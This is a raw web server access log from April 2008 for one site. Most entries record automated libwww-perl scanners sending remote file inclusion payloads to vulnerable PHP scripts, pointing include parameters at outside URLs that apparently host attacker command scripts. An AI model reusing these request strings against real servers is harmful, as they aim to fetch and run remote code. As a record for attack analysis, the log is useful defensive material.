207.58.161.77 - - [30/Apr/2008:10:36:42 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:36:51 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:36:53 -0700] "GET //skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:10:37:02 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:10:37:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:37:09 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:37:09 -0700] "GET //skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:37:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:37:16 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:37:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:37:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:37:18 -0700] "GET /logs/access_080121.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:37:22 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:10:37:22 -0700] "GET //myMailer.class.php?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:37:23 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:10:37:32 -0700] "GET /logs/access_071229.log/index.php?table=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:37:34 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:37:34 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:37:35 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:10:37:36 -0700] "GET /index.php?table=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:10:37:36 -0700] "GET /logs/index.php?table=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:10:37:39 -0700] "GET /logs/maillist/install/install3.php?database=none&cabsolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:10:37:39 -0700] "GET /maillist/install/install3.php?database=none&cabsolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:37:43 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.31.61.43 - - [30/Apr/2008:10:37:59 -0700] "GET /logs/htmltonuke.php?filnavn=http://jentshin.new21.org/zboard_eng//data/cmd/filesukses.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.31.61.43 - - [30/Apr/2008:10:38:00 -0700] "GET /htmltonuke.php?filnavn=http://jentshin.new21.org/zboard_eng//data/cmd/filesukses.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:10:38:00 -0700] "GET //?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:38:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:38:04 -0700] "GET //skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
62.94.221.218 - - [30/Apr/2008:10:38:23 -0700] "GET /logs/access_071226.log//calendar.php?l=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.221.218 - - [30/Apr/2008:10:38:24 -0700] "GET //calendar.php?l=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.221.218 - - [30/Apr/2008:10:38:25 -0700] "GET /logs//calendar.php?l=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.110 - - [30/Apr/2008:10:38:36 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.105 - - [30/Apr/2008:10:38:36 -0700] "GET /logs/access_080211.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:10:38:43 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:38:55 -0700] "GET /logs/home.php?pagina=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:38:55 -0700] "GET /home.php?pagina=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:10:39:05 -0700] "GET /logs/access_080213.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:39:34 -0700] "GET /logs/home.php?pagina=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:39:34 -0700] "GET /home.php?pagina=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:39:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.184 - - [30/Apr/2008:10:40:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:40:04 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:40:15 -0700] "GET /logs/access_080121.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.29 - - [30/Apr/2008:10:40:17 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 10609 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:40:21 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:40:22 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:42:06 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:42:06 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:42:06 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:42:11 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:42:12 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:42:12 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:42:25 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:42:25 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:10:42:28 -0700] "GET /logs/access_080213.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:42:29 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:42:29 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:42:37 -0700] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:42:37 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:42:43 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.121 - - [30/Apr/2008:10:43:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.219 - - [30/Apr/2008:10:43:39 -0700] "GET /bikes/dteel/2008_01_27/ HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:43:46 -0700] "GET /file.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:43:47 -0700] "GET /logs/file.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:10:43:50 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:10:43:51 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:10:43:51 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:10:43:57 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:10:43:57 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:10:43:58 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [30/Apr/2008:10:44:23 -0700] "GET /logs/access.log/index.php?sayfa=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [30/Apr/2008:10:44:27 -0700] "GET /index.php?sayfa=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [30/Apr/2008:10:44:28 -0700] "GET /logs/index.php?sayfa=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:10:44:45 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.30.245.149 - - [30/Apr/2008:10:44:49 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [30/Apr/2008:10:44:50 -0700] "GET /modifyform.html?code=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [30/Apr/2008:10:44:51 -0700] "GET /logs/modifyform.html?code=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:44:53 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.auctiontime.biz/logs/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:44:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.auctiontime.biz/logs/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:10:45:01 -0700] "GET /logs/config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/idp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:10:45:01 -0700] "GET /config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/idp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:45:41 -0700] "GET /logs/forum/forum.php?view=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:45:42 -0700] "GET /forum/forum.php?view=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
196.30.245.149 - - [30/Apr/2008:10:45:59 -0700] "GET /logs/access_071225.log/modifyform.html?code=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:46:12 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:46:12 -0700] "GET /modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:46:12 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:46:29 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:46:30 -0700] "GET /modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:46:30 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:46:33 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.auctiontime.biz/logs/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:46:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.auctiontime.biz/logs/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:46:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.auctiontime.biz/logs/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:47:36 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.auctiontime.biz/logs/id8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:47:36 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:47:58 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:47:58 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:10:47:59 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:48:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:48:00 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:48:01 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:48:02 -0700] "GET //Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:48:02 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:48:20 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:48:30 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:48:30 -0700] "GET //Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:48:31 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:48:37 -0700] "GET /logs/access_071225.log//spaw_control.class.php?spaw_root=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.240.12.1 - - [30/Apr/2008:10:48:47 -0700] "GET /modifyform.html?code=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
62.240.12.1 - - [30/Apr/2008:10:48:47 -0700] "GET /logs/modifyform.html?code=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
211.233.12.225 - - [30/Apr/2008:10:49:03 -0700] "GET /logs/access_080118.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.154.155 - - [30/Apr/2008:10:49:10 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [30/Apr/2008:10:49:10 -0700] "GET /announcements.php?phpraid_dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:10:49:56 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:10:49:56 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:10:49:56 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:50:19 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
